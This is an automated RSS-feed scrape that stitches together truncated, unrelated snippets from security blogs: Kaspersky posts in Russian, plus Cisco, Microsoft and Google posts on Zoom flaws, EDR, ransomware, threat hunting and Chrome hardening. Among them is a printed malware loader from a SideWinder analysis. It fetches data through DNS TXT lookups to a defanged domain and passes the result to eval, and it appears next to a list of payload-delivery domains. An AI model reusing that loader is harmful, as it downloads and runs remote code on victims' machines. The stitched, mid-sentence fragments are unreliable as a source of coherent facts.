Увы, ничего интересного не произошло: заказ на сайте провисел положенный срок на стадии «Оформлен», после чего завис со статусом «Доставка задерживается».

В марте 2020 года, когда весь мир привыкал к удаленной работе, в одном из главных инструментов для удаленного общения, клиенте для сервиса Zoom, была обнаружена уязвимость в установщике, позволяющая выполнять на компьютерах Apple произвольный код.

О новой проблеме в клиенте для веб-конференций Zoom известный исследователь Патрик Уордл рассказал на конференции DEF CON 30 в начале августа.

Проблема была в том, что в вывод также попадало имя файла.

В результате в августе 2022 года, когда Патрик Уордл докладывал о своей работе на конференции DEF CON, через 8 месяцев после сообщения в Zoom о проблеме, уязвимость так и не была закрыта полностью!

И в этом смысле история с уязвимостями в Zoom — поз…

Как устроен PoparazziОсновная фишка Poparazzi состоит в том, что в этом сервисе нельзя выкладывать свои фото и видео.

Если никто из ваших знакомых еще не зарегистрирован в Poparazzi, приложение дает возможность отправить им ссылки-приглашения.

Разработчики Poparazzi утверждают: если вы не подписаны на пользователя, он не сможет выложить попс в вашу ленту без вашего одобрения.

На ней вам предложат ввести номер телефона, который вы использовали при регистрации в Poparazzi, в поле под сообщением разработчиков.

Как защитить себя от PoparazziСтрогость настроек приватности в Poparazzi оставляет желать лучшего, поэтому хорошо подумайте, прежде чем регистрироваться на этой площадке.

Многим экспертам стало очевидно, что для эффективной работы SIEM-системы нужен новый инструмент, позволяющий ориентироваться в потоках Threat Intelligence.

Чем может помочь Threat Intelligence PlatformВ целом все вышеописанные недостатки SIEM-систем можно решить при помощи Threat Intelligence Platform.

Как Threat Intelligence Platform встраивается в работу аналитика и SIEMПо большому счету платформа Threat Intelligence, которая устанавливается во внутренней сети компании, осуществляет процесс анализа и сопоставления поступающих данных, что значительно снижает рабочую нагрузку на SIEM-систему.

Собственно говоря, платформа Threat Intelligence генерирует свой поток данных с детектами, кастомиз…

Штука в том, что в классической ситуации эти площадки обычно контролируются единой, доверенной сущностью (собственно, компанией).

Раз центрального регулирующего органа нет, то ваше слово столь же весомо, как и у остальных участников сети.

Тут важны не столько технические подробности того, как в блокчейне решены эти проблемы, сколько результат: блокчейны это не только распределенные хранилища, но и алгоритмы достижения консенсуса.

И вот что это значит в нашем случае: неважно, какие новые классные блокчейны были разработаны в этом году, Bitcoin и Ethereum по-прежнему доминируют — и, скорее всего, продолжат доминировать в обозримом будущем.

Но и это еще не все!

Решения-прослойки, которые собирают только необходимые данные с систем безопасности для более качественного обнаружения угроз и расширенной аналитики при анализе алертов или отдельных событий.

Тогда на помощь приходят современные EDR-решения (Endpoint Detection and Response), которые собирают много телеметрии с хостов и дают значительно больше возможностей для корреляции, и хантинга за угрозами.

Мы же помним, что задача безопасника — наставить как можно больше препятствий на пути атакующих.

Так появляется новый класс решений, который отвечает за роутинг и фильтрацию событий в SIEM.

С его помощью вы сможете исследовать атакующих, учиться и учить свою команду полноценной охоте за киберугрозам…

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

;T1078 Valid Accounts;Партнеры BlackCat могут приобретать доступ к сетевой инфраструктуре жертвы на специализированных теневых площадках.

;T1497 Virtualization/Sandbox Evasion;В ALPHV MORPH для противодействия анализу, в том числе и в песочнице, проверяется значение параметра командной строки access-token.

TA0011 Command and Control;T1071 Application Layer Protocol;Применяемые атакующими средства удаленного доступа могут использовать протоколы прикладного уровня (HTTP, HTTPS, DNS).

;T1572 Protocol Tunneling;Для доступа к скомпрометированной системе атакующие могут использовать туннели, построенные с использованием ngrok или gost.

;T1498 Network Denial of Service ;При отказе жертвы выплачива…

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

Фрагмент SideWinder.AntiBot.Script из https://finance.pakgov[.

]net/salary-a4222e91 function buttonClick() { if (navigator.geolocation) { navigator.geolocation.getCurrentPosition(showPosition); } else { x.innerHTML = 'Geolocation is not supported by this browser.

'; } } function showPosition(position) { alert(`lat ${position.coords.latitude} long ${position.coords.longitude}`); }

let C = 0, P = "", K = "lin9gtmn", R = () => { require("dns").resolveTxt("0x" + C + "."

+ K + ".eccbc8[.

]com", (e, d) => { if (d) { if (P += d.join(""), C++, C < 23) return R(); try { eval(global.dec(K, P)) } catch (a) {} } }) }; R()

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

а по совместительству одним из самых значимых людей в отечественной форензике — Игорем Михайловым.

С моим опытом написания постов в блог такой формат подходил мне лучше всего.

Весь процесс написания занял у нас около полугода.Как-то мне в LinkedIn написал менеджер Packt и сказал, что они планируют выпустить третье издание «Practical Mobile Forensics».

Книга эта была мне очень знакома, я читал оба издания, и во многом именно они дали отличную базу, которая позволила мне работать с мобильными устройствами.

Третья книга "Learning Android Forensics: Analyze Android devices with the latest forensic tools and techniques" должна помочь глубоко погрузиться в анализ подобных мобильных устройств.

In this blog, we’ll do a deeper dive on two of these solutions – Endpoint Detection and Response (EDR) and Managed Endpoint Detection and Response (MEDR).

However, first let’s take a look back at the history of endpoint security solutions and understand how we got EDR and MEDR security solutions.

Evolution of endpoint security solutionsThe very first endpoint security solutions started out as anti-virus solutions (AV) with basic security functionality that relied heavily on signature-based detection.

Now that we’ve gone over how endpoint security evolved into EDR and MEDR security solutions, let’s cover EDR and MEDR in more depth.

In reality, many organizations end up using both EDR and MED…

We’ve been talking a lot about security resilience recently, and for good reason.

Operational resilience means having a plan in place to be prepared for these situations.

In this video, CISOs and other security professionals explain what operational resilience means to them and why it’s a necessary component of overall security resilience:What is Supply Chain Resilience?

When it comes to security resilience, supply chains are important because they expand the attack surface to any third party in your network.

Investing in security resilience will strengthen your business in each of these areas, and help you better prepare for the challenges ahead.

Even though a hybrid workforce will provide people with the option to work from anywhere, those remote locations are sometimes in unsecured locations.

Leading the way in a hybrid environmentCisco, a leader in equipping organizations with the right products for a hybrid workforce, provides the tools & services to protect your organization from bad threat actors.

I will also be speaking with Eric Howard, Cisco Secure Technical Marketing Engineer Leader for the Security Platform and Response Group.

Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social ChannelsInstagramFacebookTwitterLinkedInShareShare:

The release of Microsoft Azure Gateway Load Balancer is great news for customers, empowering them to simply and easily add Cisco Secure Firewall capabilities to their Azure cloud infrastructure.

Securing cloud infrastructure while reducing complexityCombining Secure Firewall with Azure Gateway Load Balancer offers a significant reduction in operational complexity when securing cloud infrastructure.

Benefits of Cisco Secure Firewall with Azure Gateway Load BalancerSecure Firewall lowers cloud spend with Azure Autoscale support – Quickly and seamlessly scale virtual firewall instances up and down to meet demand.

– Effortlessly insert Cisco Secure Firewall in existing network architecture with…

While job searching, it’s critical to identify how to leverage your transferable skills and network, while also evaluating what environmental factors of work and work culture matter to you most.

Learn what it’s like to work at Cisco and the top 10 ways to suss out a workplace that suits your needs from leaders at Cisco Secure, Cisco Talos and Duo Security.

Supporting accessibility as the workplace evolvesCurrently Cisco Secure offers a hybrid model while many employees still work remotely.

Join usTo learn more about Cisco’s company culture and how you can contribute to it, check out our open roles.

Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

After stepping up to help Black Hat with the network at Black Hat Asia, we had only two and a half months until Black Hat USA, in Las Vegas, 6-11 August 2022.

I encourage you to watch the replay of the Black Hat session An Inside Look at Defending the Black Hat Network with Bart and Grifter.

The Black Hat USA network requires that every switch be replaced, so we always have full control of the network.

Check out part two of this blog, Black Hat USA 2022 Continued: Innovation in the NOC.

About Black HatFor 25 years, Black Hat has provided attendees with the very latest in information security research, development, and trends.

As mentioned above, Cisco Meraki powered Black Hat USA 2022 by providing wired and wireless networking for the entire conference.

This adds a layer of complexity to securing and protecting not just Black Hat, but also Black Hat attendees.

Acknowledgements: Special thanks to the Cisco Meraki and Cisco Secure Black Hat NOC team.

About Black HatFor 25 years, Black Hat has provided attendees with the very latest in information security research, development, and trends.

Black Hat Briefings and Trainings are held annually in the United States, Europe and USA.

We at Cisco Secure have embraced this concept for a while now with our continually growing ecosystem of multi-vendor technology integrations.

With 22 new partners and 51 new integrations in our ecosystem, Cisco Secure Technical Alliance (CSTA) now boasts over 450 integrations, including technical integrations with Cisco Duo and Cisco Kenna.

New Cisco Secure Endpoint IntegrationsAT&T CybersecurityThe AlienApp for Cisco Secure Endpoint enables you to automate threat detection and response activities between USM Anywhere and Cisco Secure Endpoint.

CertegoWith Certego Tactical Response for Cisco Secure Endpoint, monitored endpoints are monitored by the Certego PanOptikon SOAR platform.

The Cisc…

We’re very fortunate to have our security technologies powered by Cisco Talos, one of the largest and most trusted threat intelligence groups in the world.

For several years, our integrated, cloud-native Cisco SecureX platform has been delivering extended detection and response (XDR) capabilities and more.

The organization therefore implemented Cisco SecureX to accelerate investigations and incident management, maximize operational efficiency with automated workflows, and decrease threat response time.

“Make no mistake, this is a battle,” said Nick Biasini, head of outreach for Cisco Talos, who oversees a team of global threat hunters.

Additionally, the recently released Talos Intel on Dema…

At Cisco Secure, we recognize this and are continuously looking for ways to improve our information security practices.

As a result, we are excited to announce that we have achieved SOC 2 compliance for the Cisco Secure Endpoint solution, Cisco Malware Analytics, and the Cisco SecureX platform!

This is done via strong information security practices that adhere to trust service criteria for security, availability, and confidentiality.

This shows that we are committed to safeguarding your sensitive data with robust controls in place and gives you the peace of mind that your data is in good hands.

We have achieved SOC 2 Type 2 compliance for the following Cisco Secure products:To learn more ab…

Cisco is committed to maintaining a responsible, fair, and reflective approach to the governance, implementation, and use of AI technologies in our solutions.

The Cisco Responsible AI initiative maximizes the potential benefits of AI while mitigating bias or inappropriate use of these technologies.

The Cisco Responsible AI initiative and framework governs the application of responsible AI controls in our product development lifecycle, how we manage incidents that arise, engage externally, and its use across Cisco’s solutions, services, and enterprise operations.

We base our Responsible AI initiative on principles consistent with Cisco’s operating practices and directly applicable to the gov…

]xyz Domain Payload Delivery 6Y[.

]rE Domain Payload Delivery doem[.

]Re Domain Payload Delivery bpyo[.

]IN Domain Payload Delivery l5k[.

]xYZ Domain Payload Delivery uQW[.

Now let’s go over the different types of security solutions.

That being said, there are a few questions you can ask yourself to find the cybersecurity solution that best fits your needs, including:What are our security goals?

This will also help determine whether to manage your cybersecurity solution yourself or have a third-party run it for you.

These questions will help guide your decision-making process and give you the information you need to make an informed decision on your cybersecurity solution.

For more details on the different endpoint security acronyms and how to determine the right solution for your organization, keep an eye out for the next blog in this series – Unscrambling Cy…

Over her 25-year-plus career, Saleema Syed has seen the information security industry from a variety of vantage points, all while championing women in technology.

“I fell in love with the culture, the kindness, the heart of this company,” Syed said.

I’ve been extremely lucky at Duo, Cisco and Webex that I’ve been around those kinds of people.

How do we enable children and women to be more open to technology and being part of the technology field?

Join UsTo learn more about Webex, Cisco and Duo Security and how you can apply your passion, advocacy and problem solving to make a difference in cybersecurity, browse our open roles.

Microsoft researchers recently investigated an attack where malicious OAuth applications were deployed on compromised cloud tenants and then used to control Exchange servers and spread spam.

This blog presents the technical analysis of this attack vector and the succeeding spam campaign attempted by the threat actor.

Deploying malicious OAuth applicationOnce the threat actor gained access to privileged users, their next step was to set up the malicious application.

Also, in organizations that didn’t monitor for suspicious applications, the applications were deployed for months and used multiple times by the threat actor.

Familiar brand logos, names, and websites were used throughout the spa…

The fake app, detected as TrojanSpy:AndroidOS/Banker.O, used a different bank name and logo compared to a similar malware reported in 2021.

Moreover, we found that this fake app’s command and control (C2) server is related to 75 other malicious APKs based on open-source intelligence.

We strongly advise users never to click on unknown links received in SMS messages, emails, or messaging apps.

It is launched first after installation to display the fake app’s ICICI splash screen.

How the Receiver starts AutoStartServiceMitigating the fake app’s unwanted extrasThis malware’s continuing evolution highlights the need to protect mobile devices.

We discussed Microsoft Detection and Response Team’s (DART) threat hunting principles in part 1 of The art and science behind Microsoft threat hunting blog series.

In this follow-up post, we will talk about some general hunting strategies, frameworks, tools, and how Microsoft incident responders work with threat intelligence.

General hunting strategiesIn DART, we follow a set of threat hunting strategies when our analysts start their investigations.

Microsoft 365 Defender, Microsoft Sentinel, and Microsoft Defender for Cloud, which include advanced hunting, alerting, and correlation across data sources.

In addition, we work with internal threat intelligence teams, like the Microsoft Threat …

Smart App Control is provided on all Windows client editions with clean installations of Windows 11 2022 Update.

Config lock builds on the security fundamentals of Windows 11 and is, in part, secured by specific hardware features.

For example, if you work in data-sensitive scenarios, Secured-core PCs with Windows 11 can be a great choice.

This update to the Windows Security app is currently available to the Windows Insider population and will be broadly available soon.

To get more information on Windows 11 chip-to-cloud security, visit our website and check out the Windows 11 Security Book details on how Microsoft optimizes Windows 11 for Zero Trust.

Phish susceptibility assessment is a core part of any security awareness program, and we think authentic simulation is the best way to measure real-world phishing risk behavior.

Security Awareness training has evolved most commonly to be a twice-yearly simulation with a five- to seven-minute video.

User behavior risk is high, difficult to change, and exploited every day by attackers.

Stay tuned for Microsoft’s best practices on Cybersecurity Awareness Month and don’t forget to register for Terranova Security Gone Phishing Tournament.

Learn moreTo learn more about Microsoft Security solutions, visit our website.

Privileged Access WorkstationDuring a compromise recovery, we are implementing what we call a “Tactical” Privileged Access Workstation.

Implementing a proper Privileged Access Workstation together with a broader Privileged Access environment for all administrative tasks is necessary to reduce attack vectors and risk of re-compromise.

Implementing a Zero Trust security strategy is a journey that needs both technology and training, but it is necessary moving forward.

Organizations may leverage the Microsoft Zero Trust Maturity Assessment Quiz to assess their current state of Zero Trust maturity and recommendations on the next steps.

More details of how Microsoft can empower organizations in t…

Learn what EPP, EDR, XDR, and MDR can mean to you, and how Microsoft Cloud Security services work together to support the delivery of a comprehensive security foundation.

EPP: Endpoint protection platformTraditional EPPs, such as antivirus and antimalware, protected endpoints by identifying and blocking known, common, and easily detectable threats using signatures and passive heuristics (pattern or routine matching).

Modern endpoint protection adds many layers of protection beyond what has historically been offered and is an essential part of the endpoint protection framework.

Next-generation EPPs such as Microsoft Defender Antivirus add critical protection by utilizing machine learning, bi…

At Microsoft, we define threat hunting as the practice of actively looking for cyberthreats that have covertly (or not so covertly) penetrated an environment.

In reactive incident response investigations, threat hunting helps determine the full scope of the incident and informs an effective recovery and remediation strategy.

Threat hunting principlesOur forensic investigators at DART lean on the Alexiou Principle, which states four key questions for our investigators to answer:1.

Threat hunting varies depending on the main objectives or questions that need to be answered.

In our follow-up post, we will talk about general strategies behind threat hunting and how we work with threat intellige…

Shortly after the destructive cyberattacks against the Albanian government in mid-July, the Microsoft Detection and Response Team (DART) was engaged by the Albanian government to lead an investigation into the attacks.

At the time of the attacks and our engagement by the Albanian government, Microsoft publicly stated that “Microsoft is committed to helping our customers be secure while achieving more.

In that case, IBM X-Force assessed that actors affiliated with EUROPIUM gained initial access nearly a year ahead of the wiper attack.

The wiper attack was subsequently performed by a separate and unknown Iranian actor.

Observed actor activityDART and MSTIC supported the post ransom and wiper …

Microsoft threat intelligence teams have been tracking multiple ransomware campaigns and have tied these attacks to DEV-0270, also known as Nemesis Kitten, a sub-group of Iranian actor PHOSPHORUS.

Microsoft assesses with moderate confidence that DEV-0270 conducts malicious network operations, including widespread vulnerability scanning, on behalf of the government of Iran.

As with any observed nation state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts.

The modification of the DefaultAccount provides the threat actor group with a legitimate pre-existing account with nonstand…

Balaji didn’t get discouraged when he felt lost—he just kept going.

Balaji’s interview with Microsoft Partner Director of Identity and Access Management Joe Dadzie has been edited for clarity and length.

The market realized we needed something like CloudKnox, and things started accelerating.

It’s been a year since you and your company joined Microsoft, Balaji.

Balaji: When Microsoft wanted to acquire our company, my big worry was, “Is this going to be Azure-centric?

Microsoft discovered a high-severity vulnerability in the TikTok Android application, which could have allowed attackers to compromise users’ accounts with a single click.

What follows is a technical description of the vulnerability, which we analyzed using the TikTok Android application with the package name com.zhiliaoapp.musically.

The same description applies for the TikTok Android application com.ss.android.ugc.trill, as the vulnerabilities were found in common SDKs.

As part of our responsible disclosure policy through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR), we disclosed the vulnerability to TikTok in February 2022 as directed on…

See the latest threat intelligence solutions in actionWe have a lot to look forward to at this event.

Stay ahead of adversariesLet’s start with Microsoft Defender Threat Intelligence.

Throughout the Stop Ransomware with Microsoft Security digital event, we’ll be demonstrating both Microsoft Defender Threat Intelligence and Microsoft Defender External Attack Surface Management.

Unmask adversaries with Microsoft Defender Threat Intelligence : Threat intelligence is the foundation of effective cybersecurity.

Learn about two new security solutions: Microsoft Defender Threat Intelligence and Microsoft Defender External Attack Surface Management.

Ransomware as a service (RaaS) involves cybercriminals purchasing and selling access to ransomware payloads, leaked data, RaaS “kits,” and many other tools on the dark web.

It’s one of the many resources available on Microsoft Security Insider, a site where you’ll find the latest cybersecurity insights and threat intelligence updates.

They exfiltrate the victim organization’s data and extort money by threatening to release their data or sell it on the dark web.

And, very importantly, ensure that along with outside-in protection you are also doing inside-out protection focused on data security, information protection, and insider risk management.

Learn moreTo stay up-to-date on ransomware as…

Black Hat USA 2022 marked the twenty-fifth year that security researchers, security architects, and other security professionals have gathered to share the latest research, developments, and trends.

We were thrilled when several of these security professionals received the opportunity to share their thought leadership insights with Black Hat attendees.

“Advancing Investigations with Threat Intelligence”: Microsoft Incident Response Consultant MacKenzie Brown shared how Microsoft’s Detection and Response Team (DART) harnesses the power of threat intelligence while in the trenches helping customers challenged by cyberattacks.

Explore details on Microsoft’s threat intelligence solution in our …

Or, they can exploit a bug in a more powerful, privileged part of Chrome - like the “browser” process.

Here’s a sample of 100 recent high severity Chrome security bugs that made it to the stable channel, divided by root cause and by the process they affect.

We anticipate that MiraclePtr meaningfully reduces the browser process attack surface of Chrome by protecting ~50% of use-after-free issues against exploitation.

As future work, we are exploring options to expand the pointer coverage to on-stack pointers so that we can protect against more use-after-free bugs.

Note that the primary goal of MiraclePtr is to prevent exploitation of use-after-free bugs.

Google created OSS-Fuzz to fill this gap: it's a free service that runs fuzzers for open source projects and privately alerts developers to the bugs detected.

Since its launch, OSS-Fuzz has become a critical service for the open source community, helping get more than 8,000 security vulnerabilities and more than 26,000 other bugs in open source projects fixed.

Google Cloud’s Assured Open Source Software Service, which provides organizations a secure and curated set of open source dependencies, relies on OSS-Fuzz as a foundational layer of security scanning.

All of these efforts are part of Google’s $10B commitment to improving cybersecurity and continued work to make open source software mo…

Today, we are launching Google’s Open Source Software Vulnerability Rewards Program (OSS VRP) to reward discoveries of vulnerabilities in Google’s open source projects.

Last year saw a 650% year-over-year increase in attacks targeting the open source supply chain, including headliner incidents like Codecov and Log4Shell that showed the destructive potential of a single open source vulnerability.

We also encourage you to check out our Patch Rewards program, which rewards security improvements to Google’s open source projects (for example, up to $20K for fuzzing integrations in OSS-Fuzz).

Appreciation for the open source communityGoogle is proud to both support and be a part of the open sourc…

On August 3rd 2022 we open sourced the library containing the checks that we implemented so far (https://github.com/google/paranoid_crypto).

The library is developed and maintained by members of the Google Security Team, but it is not an officially supported Google product.

Unfortunately, sometimes we end up relying on black-box generated artifacts (e.g.

After the disclosure of the ROCA vulnerability, we wondered what other weaknesses may exist in crypto artifacts generated by black boxes, and what we could do to detect and mitigate them.

We then started working on this project in 2019 and created a library to perform checks against large amounts of crypto artifacts.

Posted by Eduardo Vela, Exploit CriticThe Linux kernel is a key component for the security of the Internet.

All of GKE and its dependencies are in scope, but every flag caught so far has been a container breakout through a Linux kernel vulnerability.

We’ve learned that finding and exploiting heap memory corruption vulnerabilities in the Linux kernel could be made a lot harder.

For new exploits of vulnerabilities submitted which also compromise the latest Linux kernel, we will pay an additional $21,000 USD.

We hope that, over time, we will be able to make security mitigations that make exploitation of Linux kernel vulnerabilities as hard as possible.

When Chrome users browse the web with Safe Browsing protections, Chrome uses the Safe Browsing service from Google to identify and ward off various threats.

In the most common case, Chrome uses the privacy-conscious Update API (Application Programming Interface) from the Safe Browsing service.

This API was developed with user privacy in mind and ensures Google gets as little information about the user's browsing history as possible.

Chrome with Safe Browsing checks all URLs, redirects or included resources, to identify such threats and protect users.

Safe Browsing ListsSafe Browsing provides a list for each threat it protects users against on the internet.

Posted by Matthew Maurer and Mike Yu, Android teamTo help keep Android users’ DNS queries private, Android supports encrypted DNS.

In addition to existing support for DNS-over-TLS, Android now supports DNS-over-HTTP/3 which has a number of improvements over DNS-over-TLS.

This issue is mitigated by central resolvers like Google, Cloudflare, OpenDNS and Quad9, which allow devices to configure a single DNS resolver locally for every network, overriding what is offered through DHCP.

In Android 9.0, we announced the Private DNS feature, which uses DNS-over-TLS (DoT) to protect DNS queries when enabled and supported by the server.

Unfortunately, DoT incurs overhead for every DNS request.

We blocked 1 domain from eligibility to appear on Google News surfaces and Discover as part of our investigation into coordinated influence operations linked to Iran.

The campaign was linked to Endless Mayfly and was sharing content in English about a variety of topics including US and global current events.

We received leads from Mandiant that supported us in this investigation.

We can’t wait to see whether PPP will be able to defend their crown.

For those of you looking to satisfy your late-night hacking hunger: past year's challenges, including Hackceler8 2021 matches, are open-sourced here .

On top of that there are hours of Hackceler8 2020 videos to watch!If you are just starting out in this space, last year’s Beginner’s Quest is a great resource to get started.

Sign up to expand your skill set, meet new friends in the security community, and even watch the pros in action.

For the latest announcements, see g.co/ctf subscribe to our mailing list , or follow us on @GoogleVRP .

These are relatively minor hurdles, though, and we were able to successfully run the tool with only small manual adjustments.

SBOM in the futureIt’s clear that we’re getting very close to achieving the original goal of SBOMs: using them to help manage the risk of vulnerabilities in software.

This increased interest in SBOMs saw another boost after the National Institute of Standards and Technology (NIST) released its Secure Software Development Framework , which requires SBOM information to be available for software.

This is a security problem if the JWT token is presented to a service that lacks its own audience check.

This information can be helpful to determine if any additional action i…

New Details About 2022 GCP VRPWe will pay out a total of $313,337 to the top seven submissions in the 2022 edition of the GCP VRP Prize.

Individual prize amounts will be as follows:1st prize: $133,3372nd prize: $73,3313rd prize: $31,3374th prize: $31,3115th prize: $17,3116th prize: $13,3737th prize: $13,337If you are a security researcher, here's how you can enter the competition for the GCP VRP Prize 2022:Find a vulnerability in a GCP product (check out Google Cloud Free Program to get started).

Your bug needs to be awarded a financial reward to be eligible for the GCP VRP Prize (the GCP VRP Prize money will be in addition to what you received for your bug!).

One of the goals behind the GC…

In this spirit, this post is about our journey of using heap scanning technologies to improve memory safety of C++.

Temporal memory safety refers to the problem of guaranteeing that memory is always accessed with the most up to date information of its structure, its type.

While there is appetite for different languages than C++ with stronger memory safety guarantees, large codebases such as Chromium will use C++ for the foreseeable future.

Chrome even goes further and employs a C++ garbage collector called Oilpan which deviates from regular C++ semantics but provides temporal memory safety where used.

This is similar to a garbage collected system in that it provides temporal memory safety b…

Privileged pods within the context of GKE securityWhile privileged pods can pose a security issue, it’s important to look at them within the overall context of GKE security.

To use a privileged pod as a “trampoline” in GKE, there is a major prerequisite – the attacker has to first execute a successful application compromise and container breakout attack.

While privileged pods can pose a security issue, it’s important to look at them within the overall context of GKE security.

Where privileged pods are required for the operation of a feature, we’ve added additional documentation to illustrate that fact.

In addition to the measures above, we recommend users take advantage of tools that can sc…

With Android 13 we have migrated to a new model for the provisioning of attestation keys to Android devices which is known as Remote Key Provisioning (RKP).

We now have more than 30 components in Android that can be automatically updated through Google Play, including new modules in Android 13 for Bluetooth and ultra-wideband (UWB).

In Android 13 we implemented numerous enhancements to help mitigate potential vulnerabilities that app developers may inadvertently introduce.

In Android 13, app makers can go above and beyond in removing permissions even more proactively on behalf of their users.

Later this year, we’ll begin rolling out a new destination in settings on Android 13 devices that p…

In these attacks, a user thinks they're logging into the intended site, just as in a standard phishing attack.

But instead of deploying a simple static phishing page that saves the victim's email and password when the victim tries to login, the phisher has deployed a web service that logs into the actual website at the same time the user is falling for the phishing page.

In these attacks, a user thinks they're logging into the intended site, just as in a standard phishing attack.

Phishing-resistant authentication using FIDO with security keys or a Bluetooth connection to your phone.

Through these efforts we introduced physical FIDO security keys, such as the Titan Security Key , which preve…